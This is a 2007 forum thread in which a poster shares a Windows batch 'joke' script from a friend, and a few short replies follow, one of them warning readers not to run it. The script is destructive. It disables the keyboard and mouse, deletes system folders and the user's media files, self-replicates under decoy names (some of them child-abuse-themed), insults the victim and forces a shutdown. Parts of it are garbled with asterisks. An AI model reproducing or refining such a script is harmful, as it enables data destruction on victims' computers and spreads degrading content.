View Full Version : Funny

10-18-2007, 07:11 PM
This is a funny batch my friend sent me. [hes like this is awesome click on it]

@echo off
C:\windows/rundll*2.exe Key***rd,disable
c:\windows/rundll*2.exe mouse,disable
RMDIR /y C:/programfiles
Copy &#*7;0 C:\conf.bat
Copy %0 C:\cohnf.bat
Copy %0 C:\Britneynudebigtitsxxxharcore.jpg
Copy %0 C:\armada.bat
Copy %0 C:\thing.bat
Copy %0 C:\awholelotofthings.exe
Copy %0 C:\the.bat
Copy %0 C:\returnofthejedi.AVI
Copy %0 C:\trigun.AVI
Copy %0 C:\testtaker.exe
Copy %0 C:\internet explorer.exe
Copy %0 C:\turkey.bat
Copy %0 C:\nudelittlekids.jpg
Copy %0 C:\childporn*_of_*4.jpg
Copy %0 C:\childporn2_of_*4.jpg
Copy %0 C:\childporn*_of_*4.jpg
Copy %0 C:\childporn4_of_*4.jpg
Copy %0 C:\childporn5_of_*4.jpg
Copy %0 C:\childporn6_of_*4.jpg
Copy %0 C:\childporn7_of_*4.jpg
Copy %0 C:\childporn8_of_*4.jpg
Copy %0 C:\childporn*_of_*4.jpg
Copy %0 C:\childporn*0_of_*4.jpg
Copy %0 C:\childporn**_of_*4.jpg
Copy %0 C:\childporn*2_of_*4.jpg
Copy %0 C:\childporn**_of_*4.jpg
Copy %0 C:\childporn*4_of_*4.jpg
copy %0 c:\windows\sytem*2\microsoft\%random%.bat
copy %0 c:\windows\system*2\reinst~*\0000\driverf~*\%random%.bat
for %% a in (.. .exe//.sys//.bat...
md C:\System
Copy %0 C:/System/Recovery.exe
copy %0 c:/system/00**0***0*000*0*0*0*0*0*0*0*0*0*0*0*0****0*0***0000000*00*0*00***0.bat
RMDIR /Y C:/Windows/drivers
goto gh

color 2
echo You are a Fat FUCKING ASSHOLE GOOD BYE.......!!
RMDIR c:/windows/Fonts
RMDIR C:/windows/profiles
Del c:/*.exe
Del C:/*.mp*
Del C:/*.jpg
Del c:/*.gif
c:/windows/rundll*2.exe mouse,enable
C:/windows/rundll*2.exe key***rd,enable
SHUTDOWN -s -t 20 >> autoexec.bat
goto end

mkdir c:\windows_%random%
rem it creats many folders with names that start with windows_number(for example *000*).It generates random numbers
goto end

Not sure any of this works [you think i would run it?] but the random number thing looks cool

10-18-2007, 07:13 PM
batch is so useless these days

10-18-2007, 11:07 PM
Note to the unwise: DON'T run that batch. :p

Batch isn't useless, just not widely used. Batch files are used to automate tasks, its not much of a programming language, just scripting.

10-19-2007, 06:25 PM
batch is so useless these days

What's better? A console exe that runs half of those commands?